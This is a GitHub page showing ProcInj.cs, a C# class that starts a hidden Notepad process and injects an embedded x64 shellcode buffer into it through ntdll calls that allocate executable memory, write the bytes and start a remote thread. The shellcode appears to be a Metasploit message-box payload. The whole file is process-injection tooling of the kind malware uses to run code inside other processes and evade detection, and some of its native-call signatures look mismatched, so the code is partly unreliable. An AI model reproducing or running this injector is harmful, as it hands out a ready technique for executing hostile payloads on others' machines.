-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathProcInj.cs
160 lines (125 loc) · 5.61 KB
/
ProcInj.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
using System.Diagnostics;
using System;
using System.Runtime.InteropServices;
namespace gigas;
public class ProcInj
{
[DllImport("ntdll.dll", SetLastError=true, ExactSpelling=true)]
static extern IntPtr NtAllocateVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, uint ZeroBits,
IntPtr RegionSize, uint AllocationType, uint Protect);
[DllImport("ntdll.dll", SetLastError = true)]
static extern bool NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, uint ZeroBits, byte[] Buffer, uint BufferSize,
out UIntPtr NumberOfBytesWritten);
[DllImport("ntdll.dll")]
static extern IntPtr NtCreateThreadEx(
uint DesiredAccess, // ACCESS_MASK DesiredAccess
IntPtr ObjectAttributes, // POBJECT_ATTRIBUTES ObjectAttributes
IntPtr ProcessHandle, // HANDLE ProcessHandle
IntPtr StartRoutine, // PVOID StartRoutine
IntPtr Argument, // PVOID Argument
bool CreateSuspended, // ULONG CreateFlags
IntPtr ZeroBits, // SIZE_T ZeroBits
IntPtr StackSize, // SIZE_T StackSize
IntPtr MaximumStackSize, // SIZE_T MaximumStackSize
IntPtr AttributeList // PVOID AttributeList
);
// todo: finish switching out this silly ass call
/*
*NtCreateThreadEx(
_Out_ PHANDLE ThreadHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE ProcessHandle,
_In_ PUSER_THREAD_START_ROUTINE StartRoutine,
_In_opt_ PVOID Argument,
_In_ ULONG CreateFlags, // THREAD_CREATE_FLAGS_*
_In_ SIZE_T ZeroBits,
_In_ SIZE_T StackSize,
_In_ SIZE_T MaximumStackSize,
_In_opt_ PPS_ATTRIBUTE_LIST AttributeList
*/
public static readonly byte[] Buf = new byte[]
{
0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
0x51, 0x56,
0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b, 0x52, 0x20,
0x3e, 0x48,
0x8b, 0x72, 0x50, 0x3e, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61,
0x7c, 0x02,
0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52,
0x20, 0x3e,
0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x6f,
0x48, 0x01,
0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x5c, 0x48, 0xff,
0xc9, 0x3e, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1,
0xc9, 0x0d, 0x41, 0x01,
0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x3e, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd6, 0x58, 0x3e,
0x44, 0x8b,
0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x3e, 0x41, 0x8b, 0x0c, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01,
0xd0, 0x3e,
0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a,
0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12, 0xe9, 0x49,
0xff, 0xff,
0xff, 0x5d, 0x3e, 0x48, 0x8d, 0x8d, 0x26, 0x01, 0x00, 0x00, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5,
0x49, 0xc7,
0xc1, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x48, 0x8d, 0x95, 0x0e, 0x01, 0x00, 0x00, 0x3e, 0x4c, 0x8d, 0x85, 0x1f,
0x01, 0x00,
0x00, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83, 0x56, 0x07, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x41, 0xba, 0xf0,
0xb5, 0xa2,
0x56, 0xff, 0xd5, 0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x2c, 0x20, 0x66, 0x72, 0x6f, 0x6d, 0x20, 0x4d, 0x53, 0x46,
0x21, 0x00,
0x45, 0x72, 0x72, 0x6f, 0x72, 0x21, 0x00, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00
};
public static void ProcStart()
{
int inject = NotepadStart();
if (inject == 1)
{
Console.WriteLine("process injection complete");
}
else
{
Console.WriteLine("Process injection incomplete, notepad exitCode: {}", inject);
}
}
private static int NotepadStart()
{
ProcessStartInfo start = new ProcessStartInfo();
start.FileName = "C:\\Windows\\System32\\notepad.exe";
start.WindowStyle = ProcessWindowStyle.Hidden;
start.CreateNoWindow = true;
int exitCode;
using (Process proc = Process.Start(start))
{
Injector();
proc.WaitForExit();
exitCode = proc.ExitCode;
}
return exitCode;
}
private static void Injector()
{
Process[] localByName = Process.GetProcessesByName("notepad");
foreach (Process p in localByName)
{
UnsfInj(p.Handle);
}
}
static bool UnsfInj(IntPtr h)
{
IntPtr memAlloc = NtAllocateVirtualMemory(h, IntPtr.Zero, 0,Buf.Length, 0x00001000, 0x40);
UIntPtr outout;
NtWriteVirtualMemory(h, memAlloc , 0, Buf, (uint)(Buf.Length), out outout);
if (NtCreateThreadEx(0x1FFFFF, IntPtr.Zero, h, memAlloc, IntPtr.Zero, false, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero) != IntPtr.Zero)
{
Console.Write("injection complete!");
return true;
}
else
{
Console.Write("injection failed");
return false;
}
}
}